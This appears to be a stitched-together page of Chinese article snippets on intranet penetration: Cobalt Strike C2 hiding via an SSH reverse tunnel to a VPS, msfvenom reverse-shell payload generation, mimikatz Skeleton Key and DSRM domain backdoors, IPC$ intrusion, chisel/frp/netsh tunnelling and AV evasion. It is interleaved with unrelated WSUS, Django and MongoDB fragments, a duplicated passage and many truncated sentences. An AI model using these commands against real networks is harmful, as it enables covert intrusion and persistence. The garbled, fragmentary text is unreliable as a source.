1.本地建立C2 ? 2.开启监听 2.1.配置vps域名访问 ? 2.2.开启foreign与beacon监听器 ?...4.建立隧道 4.1vps编辑sshd_config文件允许ssh转发并重启ssh服务 ?...2.mssql突破 DMZ --mssqlproxy 场景:拿到mssql,存在内网,通过mssql 服务作为跳板。对内网进行信息搜集与横向移动。...出现了问题 不能建立链接 2.5.1 解决BUG 通过阅读代码,放在目标机器上分析其存储过程,当一下语句在sql中执行的时候会报错。 ? ?...建立隧道的方式多种多样,根据具体情况分析,内网环境下允许什么什么出网,就用此构建隧道。同时注意如果存在AV,上传的工具是否免杀。
cobaltstrike的隐藏--本地C2 1.本地建立C2 2.开启监听 2.1.配置vps域名访问 2.2.开启foreign与beacon监听器 4.建立隧道 4.1vps编辑sshd_config...文件允许ssh转发并重启ssh服务 4.2建立本地cs与vps的隧道 ssh -C -f -N -g -R 0.0.0.0:80:192.168.3.10:80 root@cs.first.com -...解决方案 通过nginx多级代理结合本地c2隐藏 参考:http://www.0-sec.org/Tools/Cobalt%20Strike/32.html 特殊情况下不出网的解决方案 在内网渗透中,存在防火墙设备...对内网进行信息搜集与横向移动。...,根据具体情况分析,内网环境下允许什么什么出网,就用此构建隧道。
建立内网Windows补丁服务器 建立内网Windows补丁服务器 实施方案 一、完成内网WSUS服务器的架设。 二、对客户端计算机进行设置。 三、进行外网WSUS服务器的架设。...建立内网Windows补丁服务器 众所周知,Windows系统有着种种安全漏洞和不足,这些都要依靠微软发布的一个个补丁来弥补,但公司内网无法访问Internet,,不能及时地下载更新。...但是客户端的自我更新必须通过TCP 80端口,所以需要在默认站点下建立虚拟目录Selfupdate,使没有安装客户端的机器可以自我更新安装客户端。...下面是整个方案中较为重要的一个部分,完成从外网WSUS服务器与内网WSUS服务器之间的数据转移。首先我们需要确保外网服务器和内网服务器的快速安装文件特性和语言设置完全匹配。...此时在内网服务器上执行安装更新的操作即可完成内网客户端计算机的更新。
内网穿透 目录 内网穿透 内网穿透工具 学了网络之后,我们知道了公网和私网。私网是不能在公网传输和通信的。我们一个学校,一个小区,都是在自己单独的私网里面。...内网穿透 这就要说到内网穿透了! 如下图,有这么一个环境。小明和小王分别是清华和北大的学生。他们都各自处在自己学校的内网中,他们的ip地址可以是一样的,都是192.168.10.2。...首先,当我们登陆上QQ后,我们就会和QQ的服务器建立一个长连接,基于这个长连接,我们可以给QQ服务器发送消息,QQ服务器也可以给我们发送消息(原理和上面百度的类似)。...如果小伙伴此时没有登录QQ,那么QQ服务器将不会给小伙伴发送这条消息,因为QQ服务器此时并没有和小伙伴建立长连接,所以他根本不知道小伙伴的位置。...内网穿透工具 常用的内网穿透的工具有:NAT APP基于ngrok的国内高速内网转发工具 这款软件可以把你内网的ip和端口映射成一个公网的ip和端口,这样,我们就可以实现内网穿透了!
如果两个域之间需要互相访问,则需要建立信任关系。信任关系是连接不同域的桥梁。 域森林 多个域树通过建立信任关系组成的集合 域名服务器 用于实现域名和与之对应的IP地址转换的服务器。...在用路由器连接的内网中,可以将网络划分为三个区域:安全级别最高的内网;安全级别中等的DMZ;安全级别最低的外网(Internet)。 ?...在配置一个拥有DMZ的网络时,通常需要定义如下访问控制策略 内网可以访问外网:内网用户需要自由地访问外网。...DMZ不能访问内网:如不执行,攻击者攻陷DMZ时,厄尼旺将无法收到保护 DMZ不能访问外网:有例外 内网可以分为办公区和核心区(横向移动攻击的优先查找目标) 域中计算机的分类 域控制器...默认情况下,任何由我们建立的用户账号都属于Domain Users组,而任何由我们建立的计算机账号都属于Domain Computers组。 附带一份内网学习思维导图 ?
如果两个域之间需要互相访问,则需要建立信任关系。信任关系是连接不同域的桥梁。 域森林 多个域树通过建立信任关系组成的集合 域名服务器 用于实现域名和与之对应的IP地址转换的服务器。...在用路由器连接的内网中,可以将网络划分为三个区域:安全级别最高的内网;安全级别中等的DMZ;安全级别最低的外网(Internet)。 ? ?...在配置一个拥有DMZ的网络时,通常需要定义如下访问控制策略 内网可以访问外网:内网用户需要自由地访问外网。...DMZ不能访问内网:如不执行,攻击者攻陷DMZ时,厄尼旺将无法收到保护 DMZ不能访问外网:有例外 内网可以分为办公区和核心区(横向移动攻击的优先查找目标) 域中计算机的分类 域控制器...默认情况下,任何由我们建立的用户账号都属于Domain Users组,而任何由我们建立的计算机账号都属于Domain Computers组。 附带一份内网学习思维导图 ? ?
前言: 内网穿透的方式不少,有人会也有人不太懂,最简单的,对新手友好的就是花生壳,但是要钱,对穷人不友好,这里我们就用操作稍微有点麻烦的但是免费的frp。...(这里不讲配置的一些理论理解了,麻烦,大家可以百度内网穿透的理论知识) 我们需要生成一下木马文件 msfvenom -p windows -a x64 -p windows/x64/shell_reverse_tcp
image.png 视频内容 内网渗透之内网隧道构建 1080P超清版 微信公众号平台本身会对素材进行二次压缩,会导致画面出现不清晰等情况。
文章前言 随着企业信息化程度的加深,内网环境逐渐成为攻击者的关注的重点目标,在内网渗透的过程中权限维持是不可或缺的关键环节之一,它往往决定了攻击者能否在目标系统中长时间潜伏,获取敏感信息或者造成更大范围的破坏...本文旨在深入探讨内网渗透中的权限维持技术,包括其基本概念、常见手段以及防御措施 权限维持 DSRM域后门 基本介绍 DSRM(Directory Services Restore Mode,目录服务恢复模式...我们可以在不适用域管理员原始密码的情况下,使用注入的Skeleton Key成功连接系统,例如: net use \\dc\ipc$ "mimikatz" /user:hacke\administrator 之后可以看到已经与域控制器建立了连接...,并且把DNS也代理进去(dns设置为内网的域控) Step 6:使用Kekeo获取用户的NTLM tgt::pac /subject:Al1ex /castore:current_user /domain...,其实内网主机有window,也有Linux,所以读者不用过于局限于内网手法进行权限维持(当然这种作为首选属实极好),至于window下的一系列维权也可以进行尝试操作,例如:WMI后门、CLR维权、COM
即使用139(TCP)端口;而在Windows2000中,SMB除了基于NBT实现,还可以直接通过445端口实现 IPC$入侵,即通过使用Windows系统默认启动的IPC$共享获得计算机控制权的入侵,在内网中及其常见...分启动srv.exe(注意这里设置的时间比主机时间快) D:>at \127.0.0.25 10:50 srv.exe 上述命令中的at就是让计算机在指定的时间做指定事情的命令(例如运行程序) 补充 建立...ipc$空连接:net use \\10.96.10.59\ipc$ "密码" /user:"" 建立ipc$非空连接: net use \\10.96.10.59\ipc$ "密码".../user:"用户名" 删除ipc$连接: net use \\10.96.10.59\ipc$ /del 如果已经建立了ipc$连接而且有权限的话,把目标主机的C盘映射到本地的Z盘:net...use z: \\10.96.10.59\c$ 取消映射: net use z: /del ps:如果在域内,抓到域管理员的账号密码 建立IPC的时候可以使用域管的账号密码进行连接
三、chisel隧道搭建 0x01 chisel进行ssh内网穿透 首先需要三台linux主机,在这里使用VPS作为chisel服务器端,然后使用kali作为内网主机,使用另一台主机作为我们的攻击者主机...socks代理,然后使用SocksCap等工具进行内网扫描或者内网渗透。...这就导致一个问题,如果我直接在VPS上执行完命令之后,默认监听127.0.0.1的1080端口,这样的话,我只能用VPS去访问内网主机,如果想要在win10上通过SocksCap设置代理访问内网是行不通的...socks流量实现对内网主机的访问。...(3):使用Socks代理访问内网 使用浏览器 ? ? 成功访问到内网的通达OA。 使用SocksCap进行内网访问 ? 代理搭建成功,流量可以正常进入内网。
建立Url 路由 有了template和view,也有了数据model,但是访问一个网址,需要对我们的浏览器地址进行路由解析,服务器才能调用到我们辛辛苦苦写好的view。...首先,打开PROJECTNAME/urls.py,使用include关键字为Blog建立跳转,方便管理。
前言 在内网渗透过程中,会碰到远程控制soft或者其他,这里针对远程控制软件做如下总结。 远程控制软件 向日葵篇 向日葵查看版本 向日葵(可以攻击) 针对向日葵的话其实如果有本地安装的话,是......前言 在内网渗透过程中,会碰到远程控制soft或者其他,这里针对远程控制软件做如下总结。
无论是通过外网打点,还是水坑钓鱼,进入内网后的第一步,也是最重要的一步就是信息收集,而且信息收集往往是一直穿插在整个内网渗透过程中。...查看当前正处于等待状态的端口及ip2.查看网络配置ipconfig /all3.查看本地DNS缓存ipconfig /displaydns4.查看路由表route print5.查找有价值的内网...%I | findstr "TTL=" >> pinglive.txt 扫描的话建议直接在内网进行扫描,速度和准确率都比较有保障。...这里直接介绍需要在内网机器中执行的相关命令: 此工具的导出相对来说比较暴力,且目前此工具 exe 原版已经被识别并被各种杀软查杀,包括微软win10自带的杀软 Windows Defender 。...端口识别 扫描内网中同时开放389和53端口的机器。 端口:389服务:LDAP、ILS说明:轻型目录访问协议和NetMeeting Internet Locator Server共用这一端口。
0x00 Preface 内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。...某内网靶场的详细教程:Vulnstack(一) 内网渗透过程中经常会涉及到内网穿透,如何理解内网穿透以及端口转发、端口映射等相关知识可以参考:如何从零构建对内网穿透的理解 实操部分写的比较草率,主要是为了增强认知...四、小结 SMB协议用于实现共享,IPC用于建立连接,不连接怎么共享?...其中上图中说到,psexec第二种方法和smbexec无需建立IPC连接,我认为是不合理的。...这几种方法只是命令不同罢了,提供明文账户密码的时候也是要建立IPC连接的,因为这个利用就是基于IPC的共享。
在MongoDB官网下载对应的MongoDB版本,可以点击以下链接快速跳转到下载页面:
大家好,又见面了,我是你们的朋友全栈 frp点对点udp方式内网穿透ssh,节省服务器流量 (2019 年 5 月 30 日) frp ssh 安全连接和服务器安全设置 (2019 年 5 月 29...日) frp 控制台监控dashboard配置 (2019 年 5 月 27 日) frp内网穿透 公网访问本地web服务 (2019 年 5 月 26 日) frp安装教程 穿透SSH (2019...年 5 月 25 日) frp内网穿透简介 (2019 年 5 月 25 日) frp简介 frp 是一个内网穿透工具。...我们的电脑IP一般为192.168.0.103 这个叫内网IP,外面的电脑无法访问的。 frp进行的网络穿透原理图 frp穿透的用途 1. 在办公室访问家里的电脑,反之亦然 2.
外网 访问内网服务器。...采用 TCP 连接流式复用,在单个连接间承载更多请求,节省连接建立时间。 代理组间的负载均衡。 端口复用,多个服务通过同一个服务端端口暴露。...阅读frp中文文档 移步到官网 -> frp中文文档 frp需要配置两端,客户端和服务端,服务端是具有公网ip的服务器,客户端是内网中的服务器。 1.2....配置 服务端和客户端 目录介绍:frpc前缀的文件是内网服务需要的;frps前缀的文件是公网IP需要的。 可以查看官网示例,这里也简单的做一些介绍。 1.3.1....内网服务需要配置frpc.ini文件 按需求进行配置信息,除基础信息配置common外,其他的根据自己需求进行摘选(每一个标签都是一个独立的模块)。
(Windows的场景) LCX实现本地端口转发(Linux的场景) LCX实现SSH到内网主机(公网服务器是Windows) LCX实现SSH到内网主机(公网服务器是Linux) LCX实现3389到内网主机...内网中存在另外一台主机,这里假设内网存在一台Web服务器。然后,我们现在要将公网Web服务器设置为代理,通过公网服务器的80端口,访问和探测内网Web服务器的信息。...,比如 Proxifier 、sockscap64 Netsh实现端口转发 Netsh 是Windows自带的命令行脚本工具,它可以建立端口映射。...Netsh实现SSH到内网主机(远程端口转发) 现在我们有这么一个环境,我们获得了公网服务器的权限,并且通过公网服务器进一步的内网渗透,得到了内网主机的权限。拓扑图如下。...Windows服务器的权限,并且通过公网服务器进一步的内网渗透,得到了内网Linux主机的权限。
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
对象存储
即时通信 IM
实时音视频
